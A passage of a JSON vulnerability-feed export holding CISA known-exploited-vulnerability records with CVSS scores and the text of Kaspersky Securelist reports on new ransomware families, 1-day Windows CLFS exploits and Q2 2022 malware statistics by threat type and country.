"2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2021-34484", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "The vulnerability exists due to a type confusion error within the V8 component in Chromium, affecting all Chromium-based browsers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2022-1096", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-08-24T17:10:52", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131757/abstract_random_red_code-990x400.jpg)\n\n## Introduction\n\nIn our crimeware reporting service, we analyze the latest crime-related trends we come across. Last month, we again posted a lot on ransomware, but we also covered other subjects, such as 1-day exploits. In this blogpost, we provide excerpts from these reports.\n\nFor questions or more information about our crimeware reporting service, please contact [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).\n\n## RedAlert / N13V: yet another multiplatform ransomware variant\n\nRedAlert (aka N13V) is the latest in the multiplatform ransomware trend we described [here](<https://securelist.com/new-ransomware-trends-in-2022/106457/>) and [here](<https://securelist.com/luna-black-basta-ransomware/106950/>). The difference this time, though, is that it is not written in a cross-platform language but in C \u2014 at least the Linux version that we could get our hands on, was. It does, however, explicitly support ESXi environments. For example, it has the command-line option "-w", which stops running VMs, and it also searches for VMWare-based VMs as can be seen from the screenshots below.\n\n[![Note the specific VMWare-related strings the malware looks for](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163047/Ransomware_updates__1-day_exploits_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163047/Ransomware_updates__1-day_exploits_01.png>)\n\n**_Note the specific VMWare-related strings the malware looks for_**\n\n[![Stopping VMs](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163133/Ransomware_updates__1-day_exploits_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163133/Ransomware_updates__1-day_exploits_02.png>)\n\n**_Stopping VMs_**\n\nInterestingly, the group mentions on their onion website that a decryptor is available on all platforms. Unfortunately, we could not get our hands on the other versions, so we don't know whether the decryptor is written in a cross-platform language or not.\n\nAnother aspect that sets RedAlert apart from other ransomware groups is that they only accept payments in Monero. From a criminal point of view, the advantage is that payments cannot be traced. The problem, however, is that Monero is not accepted in every country or by every exchange, making a ransom payment more difficult for the victim.\n\nSince the group is relatively young, we couldn't find out a lot about the victimology, but RedAlert stands out as an interesting example of a group that managed to adjust their code written in C to different platforms.\n\n## Monster: Ransomware with a GUI\n\nIn July, our Darknet monitoring system detected yet another new cross-platform ransomware variant: Monster. There are a couple of peculiar properties about Monster. First, unlike other new ransomware families that are written in modern cross-platform languages (e.g. Rust, Go), Monster is written in Delphi. Second, the malware has a GUI.\n\nThis latter property is especially peculiar, as we do not remember seeing this before. There are good reasons for this, because, why would one go through the effort of implementing this when most ransomware attacks are executed using the command line in an automated way during a targeted attack? The ransomware authors must have realized this as well, since they included the GUI as an optional command-line parameter.\n\n[![GUI used by Monster](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163241/Ransomware_updates__1-day_exploits_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163241/Ransomware_updates__1-day_exploits_03.png>)\n\n**_GUI used by Monster_**\n\nThe rest of the ransomware is fairly typical. RSA + AES are used, and multiple threads help to speed up the encryption and decryption process.\n\nIn terms of victimology, we found a couple of victims located all over the world (Singapore, Indonesia, Bolivia).\n\n## CVE-2022-24521: private 1-day exploits used for attacking Windows 7-11\n\nCybercriminals have the capabilities to create so-called 1-day exploits within a matter of day(s) after the vulnerability is reported or fixed. This is the reason why many security professionals urge system admins and users to install security patches as soon as possible.\n\nOne such example is CVE-2022-24521, an arbitrary pointer dereference in the Common Log File System (CLFS) driver, which has a long history of vulnerabilities. CVE-2022-24521 allows an attacker to gain system privileges on the infected device and is exploited in different ways by various actors. Although this time, it must be said it took the criminals a little bit longer than usual to develop an exploit: two weeks after the vulnerability was disclosed. We did, however, find an exploit with a PE-timestamp dated about one week after the patch was released, indicating that a working exploit might have been available even earlier. In total, we found two different exploits, both having several versions. In both cases, the developers sell exploits privately and do not share them on GitHub or other online platforms.\n\nWhat is particularly interesting about these exploits is that they support a variety of Windows versions. This is something we usually see in commercial exploits. But the exploits have more in common: the two share a lot of debug messages. Because of these debug messages and the overall design of one of the exploits, we were able to link it to the other exploit for a much older vulnerability in the CLFS driver. In fact, we can say that the older exploit was reused for the newer vulnerability.\n\nFinally, it is worth mentioning that one of the exploits was used in the wild during an attack on a large retailer in the APAC region.\n\n## Conclusion\n\nIn this blogpost, we stepped away \u2014 even though just slightly \u2014 from solely covering ransomware. Although ransomware is still one of the biggest threats to organizations, one should realize how these attacks actually take place. Quite often criminals use exploits for which patches are already available, simply because the affected organizations do not have an optimal patching policy.\n\nProper threat intelligence can help organizations to protect themselves against these types of threats, despite a non-ideal policy. For example, as we highlighted in this blogpost, criminals sometimes reuse older exploit code for newer vulnerabilities. Properly written Yara rules help to catch these newer exploits. Also, discussing TTPs and what is currently popular amongst ransomware groups helps organizations to make better-informed decisions on how to protect their environments.\n\nFor any questions about our private reports, please contact [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T10:00:13", "type": "securelist", "title": "Ransomware updates & 1-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-08-24T10:00:13", "id": "SECURELIST:0921F9EC2DCA9018B105FA6E05CEE477", "href": "https://securelist.com/ransomware-updates-1-day-exploits/107291/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T16:13:15", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15093042/abstract_digital_report-990x400.jpg)\n\n * [IT threat evolution in Q2 2022](<https://securelist.com/it-threat-evolution-q2-2022/107099/>)\n * **IT threat evolution in Q2 2022. Non-mobile statistics**\n * [IT threat evolution in Q2 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-mobile-statistics/107123/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2022:\n\n * Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.\n * Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 100,829 unique users.\n * Ransomware attacks were defeated on the computers of 74,377 unique users.\n * Our File Anti-Virus detected 55,314,176 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2022, Kaspersky solutions blocked the launch of malware designed to steal money from bank accounts on the computers of 100,829 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025224/01-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025321/02-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.8 \n2 | Afghanistan | 4.3 \n3 | Tajikistan | 3.8 \n4 | Paraguay | 3.1 \n5 | China | 2.4 \n6 | Yemen | 2.4 \n7 | Uzbekistan | 2.2 \n8 | Sudan | 2.1 \n9 | Egypt | 2.0 \n10 | Mauritania | 1.9 \n \n_* Excluded are countries and territories with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**TOP 10 banking malware families**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 35.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.8 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.4 \n4 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 6 \n5 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 \n7 | IcedID | Trojan-Banker.Win32.IcedID | 2.1 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.9 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 1.8 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nIn the second quarter, the Lockbit group [launched a bug bounty program](<https://www.bleepingcomputer.com/news/security/lockbit-30-introduces-the-first-ransomware-bug-bounty-program/>). The cybercriminals are promising $1,000 to $1,000,000 for doxing of senior officials, reporting web service, Tox messenger or ransomware Trojan algorithm vulnerabilities, as well as for ideas on improving the Lockbit website and Trojan. This was the first-ever case of ransomware groups doing a (self-promotion?) campaign like that.\n\nAnother well-known group, Conti, said it was shutting down operations. The announcement followed a high-profile attack on Costa Rica's information systems, which prompted the government to [declare a state of emergency](<https://www.bleepingcomputer.com/news/security/costa-rica-declares-national-emergency-after-conti-ransomware-attacks/>). The Conti infrastructure was shut down in late June, but some in the infosec community believe that Conti members are either just rebranding or have split up and joined other ransomware teams, including Hive, AvosLocker and BlackCat.\n\nWhile some ransomware groups are drifting into oblivion, others seem to be making a comeback. REvil's website went back online in April, and researchers [discovered](<https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/>) a newly built specimen of their Trojan. This might have been a test build, as the sample did not encrypt any files, but these events may herald the impending return of REvil.\n\nKaspersky researchers found a way to recover files encrypted by the Yanluowang ransomware and [released a decryptor](<https://securelist.ru/how-to-recover-files-encrypted-by-yanluowang/105019/>) for all victims. Yanluowang has been spotted in targeted attacks against large businesses in the US, Brazil, Turkey, and other countries.\n\n### Number of new modifications\n\nIn Q2 2022, we detected 15 new ransomware families and 2355 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2021 \u2014 Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025415/03-en-ru-es-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2022, Kaspersky products and technologies protected 74,377 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025443/04-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025517/05-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.81 \n2 | Yemen | 1.24 \n3 | South Korea | 1.11 \n4 | Mozambique | 0.82 \n5 | Taiwan | 0.70 \n6 | China | 0.46 \n7 | Pakistan | 0.40 \n8 | Angola | 0.37 \n9 | Venezuela | 0.33 \n10 | Egypt | 0.32 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 17.91 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.58 \n3 | Magniber | Trojan-Ransom.Win64.Magni | 9.80 \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.91 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.75 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.55 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 3.51 \n8 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 3.02 \n9 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 2.96 \n10 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 2.69 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2022, Kaspersky solutions detected 40,788 new modifications of miners. A vast majority of these (more than 35,000) were detected in June. Thus, the spring depression \u2014 in March through May we found a total of no more than 10,000 new modifications \u2014 was followed by a record of sorts.\n\n_Number of new miner modifications, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025548/06-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 454,385 unique users of Kaspersky products and services worldwide. We are seeing a reverse trend here: miner attacks have gradually declined since the beginning of 2022.\n\n_Number of unique users attacked by miners, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025613/07-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025642/08-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Rwanda | 2.94 \n2 | Ethiopia | 2.67 \n3 | Tajikistan | 2.35 \n4 | Tanzania | 1.98 \n5 | Kyrgyzstan | 1.94 \n6 | Uzbekistan | 1.88 \n7 | Kazakhstan | 1.84 \n8 | Venezuela | 1.80 \n9 | Mozambique | 1.68 \n10 | Ukraine | 1.56 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nDuring Q2 2022, a number of major vulnerabilities were discovered in the Microsoft Windows. For instance, [CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) critical error allows an attacker to remotely execute arbitrary code in a system using a custom RPC request. The Network File System (NFS) driver was found to contain two RCE vulnerabilities: [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>). By sending a custom network message via the NFS protocol, an attacker can remotely execute arbitrary code in the system as well. Both vulnerabilities affect server systems with the NFS role activated. The [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) vulnerability targeting the Common Log File System (CLFS) driver was found in the wild. It allows elevation of local user privileges, although that requires the attacker to have gained a foothold in the system. [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), also known as LSA Spoofing, was another vulnerability found during live operation of server systems. It allows an unauthenticated attacker to call an LSARPC interface method and get authenticated by Windows domain controller via the NTLM protocol. These vulnerabilities are an enduring testament to the importance of timely OS and software updates.\n\nMost of the network threats detected in Q2 2022 had been mentioned in previous reports. Most of those were attacks that involved [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) access to various web services. The most popular protocols and technologies susceptible to these attacks include MS SQL Server, RDP and SMB. Attacks that use the EternalBlue, EternalRomance and similar exploits are still popular. Exploitation of Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>)) is also quite common, as the susceptible Java library is often used in web applications. Besides, the Spring MVC framework, used in many Java-based web applications, was found to contain a new vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) that exploits the data binding functionality and results in remote code execution. Finally, we have observed a rise in attacks that exploit insecure deserialization, which can also result in access to remote systems due to incorrect or missing validation of untrusted user data passed to various applications.\n\n### Vulnerability statistics\n\nExploits targeting Microsoft Office vulnerabilities grew in the second quarter to 82% of the total. Cybercriminals were spreading malicious documents that exploited [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which are the best-known vulnerabilities in the Equation Editor component. Exploitation involves the component memory being damaged and a specially designed script, run on the target computer. Another vulnerability, [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), allows downloading and running a malicious script when opening an infected document, to execute various operations in a vulnerable system. The emergence of [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>)[or Follina vulnerability](<https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/>) also increased the number of exploits in this category. An attacker can use a custom malicious document with a link to an external OLE object, and a special URI scheme to have Windows run the MSDT diagnostics tool. This, in turn, combined with a special set of parameters passed to the victim's computer, can cause an arbitrary command to be executed \u2014 even if macros are disabled and the document is opened in Protected Mode.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025713/09-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nAttempts at exploiting vulnerabilities that affect various script engines and, specifically, browsers, dipped to 5%. In the second quarter, a number of critical RCE vulnerabilities were discovered in various Google Chrome based browsers: [CVE-2022-0609](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-0609>), [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>), and [CVE-2022-1364](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1364>). The first one was found in the animation component; it exploits a Use-After-Free error, causing memory damage, which is followed by the attacker creating custom objects to execute arbitrary code. The second and third vulnerabilities are Type Confusion errors associated with the V8 script engine; they also can result in arbitrary code being executed on a vulnerable user system. Some of the vulnerabilities discovered were found to have been exploited in targeted attacks, in the wild. Mozilla Firefox was found to contain a high-risk Use-After-Free vulnerability, [CVE-2022-1097](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1097>), which appears when processing NSSToken-type objects from different streams. The browser was also found to contain [CVE-2022-28281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28281>), a vulnerability that affects the WebAuthn extension. A compromised Firefox content process can write data out of bounds of the parent process memory, thus potentially enabling code execution with elevated privileges. Two further vulnerabilities, [CVE-2022-1802](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>) and [CVE-2022-1529](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>), were exploited in cybercriminal attacks. The exploitation method, dubbed "prototype pollution", allows executing arbitrary JavaScript code in the context of a privileged parent browser process.\n\nAs in the previous quarter, Android exploits ranked third in our statistics with 4%, followed by exploits of Java applications, the Flash platform, and PDF documents, each with 3%.\n\n## Attacks on macOS\n\nThe second quarter brought with it a new batch of cross-platform discoveries. For instance, a new APT group [Earth Berberoka](<https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html>) (GamblingPuppet) that specializes in hacking online casinos, uses malware for Windows, Linux, and macOS. The [TraderTraitor](<https://www.cisa.gov/uscert/ncas/alerts/aa22-108a>) campaign targets cryptocurrency and blockchain organizations, attacking with malicious crypto applications for both Windows and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 25.61 \n2 | AdWare.OSX.Agent.ai | 12.08 \n3 | AdWare.OSX.Pirrit.j | 7.84 \n4 | AdWare.OSX.Pirrit.ac | 7.58 \n5 | AdWare.OSX.Pirrit.o | 6.48 \n6 | Monitor.OSX.HistGrabber.b | 5.27 \n7 | AdWare.OSX.Agent.u | 4.27 \n8 | AdWare.OSX.Bnodlero.at | 3.99 \n9 | Trojan-Downloader.OSX.Shlayer.a | 3.87 \n10 | Downloader.OSX.Agent.k | 3.67 \n11 | AdWare.OSX.Pirrit.aa | 3.35 \n12 | AdWare.OSX.Pirrit.ae | 3.24 \n13 | Backdoor.OSX.Twenbc.e | 3.16 \n14 | AdWare.OSX.Bnodlero.ax | 3.06 \n15 | AdWare.OSX.Agent.q | 2.73 \n16 | Trojan-Downloader.OSX.Agent.h | 2.52 \n17 | AdWare.OSX.Bnodlero.bg | 2.42 \n18 | AdWare.OSX.Cimpli.m | 2.41 \n19 | AdWare.OSX.Pirrit.gen | 2.08 \n20 | AdWare.OSX.Agent.gen | 2.01 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, the TOP 20 ranking for threats detected by Kaspersky security solutions for macOS users is dominated by various adware. AdWare.OSX.Amc.e, also known as Advanced Mac Cleaner, is a newcomer and already a leader, found with a quarter of all attacked users. Members of this family display fake system problem messages, offering to buy the full version to fix those. It was followed by members of the AdWare.OSX.Agent and AdWare.OSX.Pirrit families.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025743/10-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 2.93 \n2 | Canada | 2.57 \n3 | Spain | 2.51 \n4 | United States | 2.45 \n5 | India | 2.24 \n6 | Italy | 2.21 \n7 | Russian Federation | 2.13 \n8 | United Kingdom | 1.97 \n9 | Mexico | 1.83 \n10 | Australia | 1.82 \n \n_* Excluded from the rating are countries and territories with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2022, the country where the most users were attacked was again France (2.93%), followed by Canada (2.57%) and Spain (2.51%). AdWare.OSX.Amc.e was the most common adware encountered in these three countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol, as before.\n\nTelnet | 82,93% \n---|--- \nSSH | 17,07% \n \n**_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2022_**\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 93,75% \n---|--- \nSSH | 6,25% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 36.28 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 14.66 \n3 | Backdoor.Linux.Mirai.ek | 9.15 \n4 | Backdoor.Linux.Mirai.ba | 8.82 \n5 | Trojan.Linux.Agent.gen | 4.01 \n6 | Trojan.Linux.Enemybot.a | 2.96 \n7 | Backdoor.Linux.Agent.bc | 2.58 \n8 | Trojan-Downloader.Shell.Agent.p | 2.36 \n9 | Trojan.Linux.Agent.mg | 1.72 \n10 | Backdoor.Linux.Mirai.cw | 1.45 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q2-2022/107025/#attacks-on-iot-honeypots>) for Q2 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### TOP 10 countries and territories that serve as sources of web-based attacks\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2022, Kaspersky solutions blocked 1,164,544,060 attacks launched from online resources across the globe. A total of 273,033,368 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025818/11-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users around the world, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 26.07 \n2 | Hong Kong | 14.60 \n3 | Algeria | 14.40 \n4 | Nepal | 14.00 \n5 | Tunisia | 13.55 \n6 | Serbia | 12.88 \n7 | Sri Lanka | 12.41 \n8 | Albania | 12.21 \n9 | Bangladesh | 11.98 \n10 | Greece | 11.86 \n11 | Palestine | 11.82 \n12 | Qatar | 11.50 \n13 | Moldova | 11.47 \n14 | Yemen | 11.44 \n15 | Libya | 11.34 \n16 | Zimbabwe | 11.15 \n17 | Morocco | 11.03 \n18 | Estonia | 11.01 \n19 | Turkey | 10.75 \n20 | Mongolia | 10.50 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 8.31% of the Internet users' computers worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025917/12-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2022, our File Anti-Virus detected **55,314,176** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries and territories.\n\nNote that these rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 47.54 \n2 | Tajikistan | 44.91 \n3 | Afghanistan | 43.19 \n4 | Yemen | 43.12 \n5 | Cuba | 42.71 \n6 | Ethiopia | 41.08 \n7 | Uzbekistan | 37.91 